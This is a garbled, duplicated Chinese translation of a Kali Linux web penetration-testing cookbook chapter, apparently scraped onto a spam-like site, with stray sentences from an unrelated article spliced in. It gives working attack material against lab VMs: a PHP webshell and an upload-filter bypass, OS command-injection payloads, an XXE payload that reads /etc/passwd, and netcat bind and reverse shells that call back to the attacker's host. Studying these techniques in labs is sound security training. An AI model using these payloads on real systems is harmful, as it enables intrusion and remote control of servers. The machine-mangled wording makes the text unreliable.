www.hj8828.com 13

第六章 利用 – 低悬的果实

在进行漏洞评估和渗透测验时,大家不感到奇纠结于操作系统级其余纰漏,最后忽视了Layer
7难点。由于在长距离登陆和SSH的Linux系统上设有比很多攻击面,由此那是四个异常危险的圈套。事实上,在小编眼里,繁多基于Linux的瑕疵位于应用层。可能是Apache、PHP或OpenSSL,只怕只是相似的荒唐配置,假如漏洞能够因而HTTP访问,那就更危险了。

作者:Gilberto Najera-Gutierrez
译者:飞龙
协议:CC BY-NC-SA
4.0

第六章 利用 — 低悬的成果

作者:Gilberto Najera-Gutierrez

译者:飞龙

协议:CC BY-NC-SA
4.0

大规模的纰漏有SQL攻击和跨站点脚本,对于Linux
Web安全的话还应该有越来越多。上边列出的是笔者时常看见的基于Linux的种类上的别的Web安全漏洞,供你参照他事他说加以考察,便于减少与Web相关的高风险:

简介

那章开头大家会开头波及渗透测验的的应用规模。和漏洞评估的主要性不一致是,漏洞评估中测量试验者识别漏洞(好多光阴使用自动化扫描器)和提议什么样缓和它们的建议。而渗透测量检验中测验者作为恶意攻击者并尝试选拔检查评定到的尾巴,并赢得最终的结果:整个系列的失守,内部网络访谈,敏感数据败露,以及其余。相同的时候,要小心不要影响系统的可用性也许为真正的攻击者留下后门。

事先的章节中,大家曾经关系了怎么着检查测验 Web
应用中的一些纰漏。这一章中大家盘算询问哪些运用那个纰漏并选择它们来提取音信和获取行使及系统受限部分的访谈权。

简介

那章先河我们会起初波及渗透测量检验的的运用规模。和漏洞评估的要害差别是,漏洞评估中测验者识别漏洞(相当多时光利用自动化扫描器)和建议如何缓和它们的提出。而渗透测量试验中测量试验者作为恶意攻击者并尝试利用检测到的尾巴,并赢得最后的结果:整个体系的沦陷,内部互连网访问,敏感数据走漏,以及其他。同有的时候候,要警醒不要影响系统的可用性只怕为真正的攻击者留下后门。

事先的章节中,大家已经关系了如何检查测量试验 Web
应用中的一些破绽。这一章中大家策动询问怎么样选取这么些纰漏并选择它们来提打消息和获得行使及系统受限部分的访谈权。

PHP代码凌犯会允许恶意代码直接施行。小编看齐过服务器端脚本引擎接受未过滤的PHP输入,运转在服务器上,提供系统等级的服务器访谈。

6.1 恶意使用文件包括和上传

咱俩在第四章中见到,文件包含漏洞在开采者对转移文书路线的输入校验不当,并应用该路径来含有源代码文件时出现。服务端语言的今世版本,例如PHP 自 5.2.0 起,将一些表征暗许关闭,比方远程文件包蕴,所以 2013年起就相当的小恐怕找到 WranglerFI 了。

其一等秘书籍中,大家会上传一些黑心文件,在那之中之一是
Webshell(可用来在服务器中施行命令的页面),之后选用当麻芋果件包涵来实行它。

6.1 恶意使用文件包蕴和上传

大家在第四章中看到,文件包罗漏洞在开拓者对转移文书路线的输入校验不当,并动用该路线来含有源代码文件时出现。服务端语言的今世版本,举例PHP 自 5.2.0 起,将部分性格暗中同意关闭,举例远程文件满含,所以 贰零壹壹年起就比比较小只怕找到 ENCOREFI 了。

以此法门中,咱们会上传一些黑心文件,个中之一是
Webshell(可用来在服务器中实践命令的页面),之后采纳当和姑件包含来进行它。

行使HTTP
GET要求并不是POST央浼通过顾客名和密码。那么些毛病能促成允许Web应用和操作系统级其他特权扩张。

准备

其一秘诀中,大家会采纳 vulnerable_vm 中的 DVWA
,并以中等安全等第配置,所以让我们将其配置起来。

  • 1.访问http://192.168.56.102/dvwa

  • 2.登录。

  • 3.将安全品级设置为中。访谈DVWA Security,在组合框中甄选medium并点击Submit

我们会上传一些文书给服务器,可是你须求记住它们积累在哪个地方,以便之后调用。所以,在
DVWA 中访谈Upload并上传任何 JPG
图像。要是成功了,他会告知您文件上传到了../../hackable/uploads/。以往大家精通了用来积存上传文件的相对路线。那对于秘籍就丰盛了。

咱俩也供给准备好大家的文件,所以让大家创制带有一下剧情的文书文件:

1  <?
2  system($_GET['cmd']); 
3  echo '<form method="post" action="../../hackable/uploads/webshell. php"><input type="text" name="cmd"/></form>'; 
4  ?>

将其保存为webshell.php。我们需求另贰个文件,创制rename.php并输入下列代码:

1  <?
2  system('mv ../../hackable/uploads/webshell.jpg ../../hackable/uploads/ webshell.php'); 
3  ?>

其一文件会承受特殊图像文件(webshell.jpg)并将其重命名字为webshell.php

准备

其一等秘书籍中,我们会选择 vulnerable_vm 中的 DVWA
,并以中等安全等第配置,所以让大家将其配备起来。

  1. 访问http://192.168.56.102/dvwa

  2. 登录。

  3. 将安全等第设置为中。访谈DVWA Security,在组合框中甄选medium并点击Submit

大家会上传一些文本给服务器,但是你须要记住它们储存在哪儿,以便之后调用。所以,在
DVWA 中拜访Upload并上传任何 JPG
图像。假诺成功了,他会报告您文件上传到了../../hackable/uploads/。以往大家清楚了用来积存上传文件的相对路线。那对于诀窍就够用了。

咱俩也亟需预备好我们的公文,所以让大家创立带有一下内容的文书文件:

<? 
system($_GET['cmd']); 
echo '<form method="post" action="../../hackable/uploads/webshell. php"><input type="text" name="cmd"/></form>'; 
?>

将其保存为webshell.php。大家须要另多少个文书,创造rename.php并输入下列代码:

<? 
system('mv ../../hackable/uploads/webshell.jpg ../../hackable/uploads/ webshell.php'); 
?>

其一文件会经受新鲜图像文件(webshell.jpg)并将其重命名称叫webshell.php

密码弱连同侵犯者锁定的短缺。笔者曾开掘使用自动的密码破解者,如Brutus和旧有的登陆估量器,平日,当出现弱登入时,获取在Web站点或利用的未授权访谈特别轻巧。

操作步骤

  • www.hj8828.com,1.第一,让大家尝试上传大家的 webshell。在 DVWA
    中做客Upload之后尝试上传webshell.php,像这样:
于是,这里对于我们能够上传的东西有个验证。这意味着我们需要上传图标文件,或更精确来说,带有`.jpg`或`.png`的图像文件。这就是为什么我们需要重命名脚本来还原原始文件的`.php`扩展,便于我们执行它。
  • 2.为了幸免于核实证错误,我们供给将大家的 PHP
    文件重命名称叫使得的扩充名。在终点中,我们须求拜见 PHP
    文件所在目录并创设它们的别本:

1  cp rename.php rename.jpg 
2  cp webshell.php webshell.jpg
  • 3.现行反革命,让大家重临 DVWA 并尝试上传二者:
  • 4.假使七个 JPG
    文件都上传了,大家使用当羊眼半夏件包括漏洞过来实施rename.jpg。访谈文件包蕴部分并选择那几个漏洞来含有../../hackable/uploads/rename.jpg
我们并没有得到这个文件执行的任何输出,我们需要假设`webshell.jpg`命名为`webshell.php`。
  • 5.假诺它能源办公室事,大家应当能力所能达到包含../../hackable/uploads/ webshell.php,让我们尝试:

  • 6.在左上角的文本框中,输入/sbin/ifconfig并按下回车:

并且它能够工作。就像图片中那样,服务器的 IP
是`192.168.56.102`。现在,我们可以在服务器中执行命令,通过将它们键入到文本框中,或者为`cmd`参数设置不同的值。

操作步骤

  1. 首先,让大家尝试上传大家的 webshell。在 DVWA
    中做客Upload日后尝试上传webshell.php,像这样:

    www.hj8828.com 1

    于是,这里对于大家能够上传的东西有个表明。那意味着大家要求上传Logo文件,或更规范来讲,带有.jpg.gif.png的图像文件。那正是为什么大家必要重命名脚本来还原原始文本的.php扩张,便于我们实施它。

  2. 为了防止验证错误,大家需求将大家的 PHP
    文件重命名称叫使得的庞大名。在极限中,大家需要拜会 PHP
    文件所在目录并创办它们的别本:

    cp rename.php rename.jpg 
    cp webshell.php webshell.jpg
    
  3. 当今,让大家回来 DVWA 并尝试上传二者:

    www.hj8828.com 2

  4. 譬如七个 JPG
    文件都上传了,我们选用当麻芋果件满含漏洞过来实施rename.jpg。访谈文件满含部分并行使那一个漏洞来含有../../hackable/uploads/rename.jpg

    www.hj8828.com 3

    大家并不曾赢得这一个文件实践的任何输出,我们需求假诺webshell.jpg命名为webshell.php

  5. 假诺它能工作,大家应当能够包蕴../../hackable/uploads/ webshell.php,让我们索求:

    www.hj8828.com 4

  6. 在左上角的文本框中,输入/sbin/ifconfig并按下回车:

    www.hj8828.com 5

    与此同不时候它亦可职业。就好像图片中那么,服务器的 IP
    192.168.56.102。现在,大家得以在服务器中实施命令,通过将它们键入到文本框中,恐怕为cmd参数设置分化的值。

弱的公文和目录权限会容许系统列举。小编常发掘备份或测量检验文件包含旧有和未经维护的代码,提供了不是种种人都急需看见的音讯。

做事原理

在上传有效 JPG
文件时,大家所做的首先个测量试验是为了开掘上传文件保留的路线,便于大家能够在rename.php中,以及表单的action中动用这么些渠道。

利用重命名脚本有五个着眼原由:首先,上传页面只同意 JPG
文件,所以大家的剧本要求这几个扩充名,其次,我们须求带参数调用大家的
webshell(要推行的一声令下),而大家从 Web 服务器调用图片时无法带参数。

PHP
中的system()函数是攻击大旨,它所做的是,施行系统命令并出示输出。这允许我们将
webshell 文件从.jpg重命名称为.php文件并实践大家钦赐为 GET 参数的通令。

做事原理

在上传有效 JPG
文件时,大家所做的率先个测量检验是为了发现上传文件保留的渠道,便于大家能够在rename.php中,以及表单的action中运用那几个渠道。

使用重命名脚本有多少个根本原由:首先,上传页面只允许 JPG
文件,所以大家的脚本须要以此扩张名,其次,大家须要带参数调用大家的
webshell(要施行的命令),而小编辈从 Web 服务器调用图片时不能够带参数。

PHP
中的system()函数是攻击核心,它所做的是,实践系统命令并出示输出。那允许大家将
webshell 文件从.jpg重命名字为.php文本并实践大家钦定为 GET 参数的一声令下。

7标题。由于在远距离登入和SSH的Linux系统上设有许多攻…

更多

比方大家上传并施行了服务端代码,我们有那几个选项来抢占服务器,比方,下列代码能够在绑定的
shell 中调用:

1  nc -lp 12345 -e /bin/bash

它开垦服务器的 TCP 12345
端口并监听连接。连接创立之后,它会将吸收接纳的音信作为输入来推行/bin/bash,并把出口通过互联网发给被连接的主机(攻击者主机)。

也得以让服务器下载一些恶意程序,譬如提义务用,实施它来获得更加高权力。

更多

一旦大家上传并试行了服务端代码,我们有成百上千选用来打下服务器,比如,下列代码能够在绑定的
shell 中调用:

nc -lp 12345 -e /bin/bash

它展开服务器的 TCP 12345
端口并监听连接。连接建构未来,它会将接收的消息作为输入来实践/bin/bash,并把出口通过互联网发给被一连的主机(攻击者主机)。

也足以让服务器下载一些恶意程序,比方提义务用,施行它来获取更加高权力。

6.2 利用 OS 命令注入

在上三个秘技中,大家见到 PHP 的system()怎么用于在服务器中实行 OS
命令。不经常开拓者会使用类似于它的命令,大概一模一样的功用来实行一些任务,不经常候他们会采纳无效的客户输入作为参数来实施命令。

这些秘技中,我们会选择命令注入漏洞来提取服务器中的主要音讯。

6.2 利用 OS 命令注入

在上贰个法门中,大家看看 PHP 的system()怎么着用于在服务器中实施 OS
命令。不经常开荒者会选择类似于它的授命,恐怕同一的效率来施行一些职责,一时候他们会选择无效的客商输入作为参数来施行命令。

其一等秘书籍中,大家会选拔命令注入漏洞来领取服务器中的主要消息。

操作步骤

  • 1.登录 DVWA 访问Command Execution

  • 2.我们会看到Ping for FREE表单,试试它呢。Ping192.168.56.1(在主机网络中,我们的
    Kali Linux 的 IP)。

这个输出看起来像是直接的 ping 命令的输出。这表明服务器使用 OS
命令来执行 ping。所以它可能存在 OS 命令注入。
  • 3.让我们尝试注入二个非常轻巧的命令,提交下列代码:

1  192.168.56.1;uname -a.

大家能够看来uname命令的出口就在 ping
的出口之后。这里存在命令注入漏洞。

  • 4.一旦不带IP地址会怎么着啊:;uname -a:

  • 5.现行反革命,我们谋算获取服务端的反向
    shell。首先大家亟须确定保证服务器材有所需的任何事物。提交下列代码:;ls /bin/nc*

所以我们拥有多于一种版本的
Netcat,我们打算使用它来生成连接。`nc`的OpenBSD版本不支持执行连接命令,所以我们使用传统的版本。
  • 6.下一步是监听 Kali 主机的连日。张开终端并实施下列命令:

1  nc -lp 1691 -v
  • 7.回来浏览器中,提交那个:;nc.traditional -e /bin/bash 192.168.56.1 1691 &
    ![](http://git.oschina.net/wizardforcel/kali-linux-web-pentest-cookbook-zh/raw/master/img/6-2-5.jpg
    我们的终点会对连日做出反应。我们未来能够实施非交互式命令并检查它们的出口。

操作步骤

  1. 登录 DVWA 访问Command Execution

  2. 作者们拜谒到Ping for FREE表单,试试它呢。Ping
    192.168.56.1(在主机互连网中,大家的 Kali Linux 的 IP)。

    www.hj8828.com 6

    以此输出看起来疑似直接的 ping 命令的出口。那评释服务器使用 OS
    命令来实施 ping。所以它也许存在 OS 命令注入。

  3. 让大家尝试注入三个极度轻松的命令,提交下列代码:

    192.168.56.1;uname -a.
    

    www.hj8828.com 7

    我们能够看到uname一声令下的出口就在 ping
    的出口之后。这里存在命令注入漏洞。

  4. 即使不带IP地址会怎么样啊:;uname -a:

    www.hj8828.com 8

  5. 明天,大家筹算获取服务端的反向
    shell。首先我们必须确认保障服务器材备所需的任何事物。提交下列代码:;ls /bin/nc*

    www.hj8828.com 9

    就此我们富有多于一种版本的
    Netcat,大家计划动用它来变化连接。nc的OpenBSD版本不帮助实践连接命令,所以我们利用守旧的版本。

  6. 下一步是监听 Kali 主机的总是。打开终端并实行下列命令:

    nc -lp 1691 -v
    
  7. 归来浏览器中,提交这么些:;nc.traditional -e /bin/bash 192.168.56.1 1691 &

    ![](http://git.oschina.net/wizardforcel/kali-linux-web-pentest-cookbook-zh/raw/master/img/6-2-5.jpg

    咱俩的顶点会对连接做出反应。大家前日得以实行非交互式命令并检查它们的输出。

干活规律

就疑似 SQL
注入的例证那样,命令注入漏洞的源点弱输入校验机制,以及利用客户提供的数目来拼接之后会用做
OS 命令的字符串。若是我们查阅刚刚攻击的页面源代码(每个 DVWA
页面包车型地铁右下角会有个按键),拜访到那几个:

1  <?php
2  if( isset( $_POST[ 'submit' ] ) ) { 
3  
4      $target = $_REQUEST[ 'ip' ];
5  
6      // Determine OS and execute the ping command. 
7      if (stristr(php_uname('s'), 'Windows NT')) { 
8          $cmd = shell_exec( 'ping ' . $target );
9          echo '<pre>'.$cmd.'</pre>'; 
10
11     } else {
12        $cmd = shell_exec( 'ping -c 3 ' . $target ); 
13        echo '<pre>'.$cmd.'</pre>';
14     } 
15 } 
16 ?>

我们得以见到,它直接将顾客的输入附加到 ping
命令前面。大家所做的一味是增多贰个分行,系统的 shell
会将其表达为命令的分隔符,以及下一个大家筹划推行的吩咐。

在中标实施命令之后,下一步就是印证服务器是或不是具有Netcat。它是一个力所能致创立网络连接的工具,在一些本子中还足以在新连接创立今后实践命令。大家见到了服务器的系统具备四个不等版本的
Netcat,并实施了大家已知援助所需特征的版本。

从此未来大家陈设攻击系统来监听 TCP 1691 端口连接(也足以是别的其余可用的 TCP
端口),然后大家让服务器连接受大家的机器,通过该端口并在接连建即刻实行/bin/bash(系统
shell)。所以大家经过连接发送的别样事物都会棉被和衣服务器收到作为 shell
的输入。

也得以让服务器下载一些恶意程序,比如提权利用,试行它来收获越来越高权力。

办事原理

如同 SQL
注入的事例那样,命令注入漏洞的起点弱输入校验机制,以及选取用户提供的数目来拼接之后会用做
OS 命令的字符串。假诺我们查阅刚刚攻击的页面源代码(各样 DVWA
页面包车型地铁右下角会有个按键),会看到这个:

<?php
if( isset( $_POST[ 'submit' ] ) ) {

    $target = $_REQUEST[ 'ip' ];

    // Determine OS and execute the ping command.    
    if (stristr(php_uname('s'), 'Windows NT')) {
        $cmd = shell_exec( 'ping  ' . $target );        
        echo '<pre>'.$cmd.'</pre>';            

    } else {             
        $cmd = shell_exec( 'ping  -c 3 ' . $target );        
        echo '<pre>'.$cmd.'</pre>';        
    }    
} 
?>

笔者们能够看出,它平素将顾客的输入附加到 ping
命令前边。大家所做的单纯是增加二个分公司,系统的 shell
会将其解释为命令的分隔符,以及下一个大家准备试行的一声令下。

在功成名就试行命令之后,下一步正是印证服务器是不是持有
Netcat。它是二个可见创设互联网连接的工具,在部分版本中还足以在新连接创设之后推行命令。大家来看了服务器的系统全数八个例外版本的
Netcat,并实践了大家已知帮忙所需特征的版本。

其后我们布署攻击系统来监听 TCP 1691 端口连接(也得以是别的其余可用的 TCP
端口),然后我们让服务器连接受大家的机器,通过该端口并在三翻五次建霎时举行/bin/bash(系统
shell)。所以大家透过延续发送的任何瑾西都会被服务器收到作为 shell
的输入。

也足以让服务器下载一些恶意程序,举例提任务用,实行它来获得越来越高权力。

6.3 利用 XML 外界实体注入

XML 是珍视用来描述文书档案或数据结构的格式,比如,HTML 是XML
的落实,它定义了页面和它们的涉及的结谈判格式。

XML 实体类似于概念在 XML
结构中的数据结构,它们中的一些能力所能达到从文件系统中读取文件或然以致是施行命令。

这几个秘技中,大家会采取 XML 外部实体注入漏洞来在服务器中实行代码。

6.3 利用 XML 外界实体注入

XML 是最重要用于描述文书档案或数据结构的格式,比如,HTML 是XML
的兑现,它定义了页面和它们的关联的构造和格式。

XML 实体类似于概念在 XML
结构中的数据结构,它们中的一些力所能致从文件系统中读取文件只怕乃至是施行命令。

其一等秘书籍中,大家会选用 XML 外界实体注入漏洞来在服务器中进行代码。

准备

提出您早先此前遵守上贰个法门中的步骤。

准备

建议您早先在此之前服从上二个法门中的步骤。

操作步骤

  • 1.浏览http://192.168.56.102/mutillidae/index.php?page=xmlvalidator.php

  • 2.地点写着它是个 XML
    校验器。让我们尝试提交测量检验示例来观望爆发怎么着。在 XML
    输入框中,输入<somexml><message>Hello World</message></ somexml>,并点击Validate XML

  • 3.现行反革命让我们着重它是或不是精确管理了实体,提交种类代码:

1  <!DOCTYPE person [
2      <!ELEMENT person ANY> 
3      <!ENTITY person "Mr Bob">
4  ]> 
5  <somexml><message>Hello World &person;</message></somexml>

此处,我们只有定义了实体并将值"Mr Bob"赋给它。解析器在展现结果时解释了实体并替换了它的值。

  • 4.那正是中间实体的利用,让大家品尝外界实体:

1  <!DOCTYPE fileEntity [
2       <!ELEMENT fileEntity ANY> 
3       <!ENTITY fileEntity SYSTEM "file:///etc/passwd"> 
4  ]> 
5  <somexml><message>Hello World &fileEntity;</message></somexml>

行使这几个手艺,大家就能够提取系统中的任何文件,只要它们得以在 Web
服务器的周转条件被客商读取。

咱俩也能够采取 XEE 来加载页面。在上二个法门中,大家已经设法将 webshell
上盛传服务器中,让我们试试吧。

1  <!DOCTYPE fileEntity [ 
2      <!ELEMENT fileEntity ANY> 
3      <!ENTITY fileEntity SYSTEM "http://192.168.56.102/dvwa/hackable/uploads/ webshell.php?cmd=/sbin/ifconfig"> 
4 ]> 
5  <somexml><message>Hello World &fileEntity;</message></somexml>

操作步骤

  1. 浏览http://192.168.56.102/mutillidae/index.php?page=xmlvalidator.php

  2. 上边写着它是个 XML 校验器。让我们尝试提交测量检验示例来考查产生怎么着。在
    XML
    输入框中,输入<somexml><message>Hello World</message></ somexml>,并点击Validate XML

    www.hj8828.com 10

  3. 当今让我们注重它是不是精确管理了实体,提交种类代码:

    <!DOCTYPE person [  
        <!ELEMENT person ANY>  
        <!ENTITY person "Mr Bob"> 
    ]> 
    <somexml><message>Hello World &person;</message></somexml>
    

    www.hj8828.com 11

    那边,大家独有定义了实体并将值"Mr Bob"赋给它。分析器在展现结果时解释了实体并替换了它的值。

  4. 这正是中间实体的应用,让大家尝试外界实体:

    <!DOCTYPE fileEntity [  
        <!ELEMENT fileEntity ANY>  
        <!ENTITY fileEntity SYSTEM "file:///etc/passwd"> 
    ]> 
    <somexml><message>Hello World &fileEntity;</message></somexml>
    

    www.hj8828.com 12

    运用这几个技能,大家就足以领到系统中的任何公文,只要它们能够在 Web
    服务器的运作情形被客商读取。

    笔者们也得以利用 XEE 来加载页面。在上多少个秘诀中,大家早已设法将
    webshell 上传播服务器中,让大家探索啊。

    <!DOCTYPE fileEntity [ 
        <!ELEMENT fileEntity ANY> 
        <!ENTITY fileEntity SYSTEM "http://192.168.56.102/dvwa/hackable/uploads/ webshell.php?cmd=/sbin/ifconfig"> 
    ]> 
    <somexml><message>Hello World &fileEntity;</message></somexml>
    

    www.hj8828.com 13

行事原理

XML 具有叫狠抓体的性状。XML
实体是与值关联的名号,每一回实体在文书档案中运用的时候,它都会在
XML文件管理时替换为值。使用它以及不一致的可用包装器(file://来加载系统文件,可能http://来加载
U安德拉L),大家就能够通过输入校验和XML
剖析器的布署,恶意使用未有创设安全措施的贯彻,并领取敏感数据依旧以至在服务器中推行系统命令。

以此法门中,大家运用file://包装器来使分析器加载服务器中的狂妄文件,之后,使用http://包装器,大家调用了网页,它碰巧是同二个服务器中的
webshell,并施行了一部分发令。

职业原理

XML 具有叫加强体的性状。XML
实体是与值关联的称谓,每一回实体在文书档案中使用的时候,它都会在
XML文件管理时替换为值。使用它以及分裂的可用包装器(file://来加载系统文件,或许http://来加载
U昂科雷L),大家就能够通过输入校验和XML
剖析器的配置,恶意使用未有客观安全措施的贯彻,并领取敏感数据依旧以至在服务器中推行系统命令。

以此秘诀中,我们利用file://包装器来使分析器加载服务器中的放肆文件,之后,使用http://包装器,我们调用了网页,它碰巧是同多个服务器中的
webshell,并实践了有个别命令。

更多

那个漏洞也可以用来发起 DoS 攻击,叫做“Billion
laughs”,你能够在维基百科中阅读越多新闻:https://en.wikipedia.org/wiki/Billion_laughs

PHP 也支撑分化的 XML
实体包装器(类似于file://http://),假使它在服务器中被翻开,也会在不要求上传文件的状态下同意命令推行,它就是expect://。你能够在此地找到更加多它和别的包装器的音讯:http://www.php.net/manual/en/wrappers.php

更多

其一漏洞也足以用来发起 DoS 攻击,叫做“比尔ion
laughs”,你能够在维基百科中读书更加多消息:https://en.wikipedia.org/wiki/Billion_laughs

PHP 也帮助不一样的 XML
实体包装器(类似于file://http://),要是它在服务器中被展开,也会在没有供给上传文件的场合下同意命令施行,它正是expect://。你能够在此处找到越来越多它和别的包装器的音信:http://www.php.net/manual/en/wrappers.php

另见

XXE
漏洞怎么样在世界上最盛行的站点上开采的例证,能够在此处查看:http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution

另见

XXE
漏洞怎样在世界上最风靡的站点上开掘的事例,可以在此间查看:http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution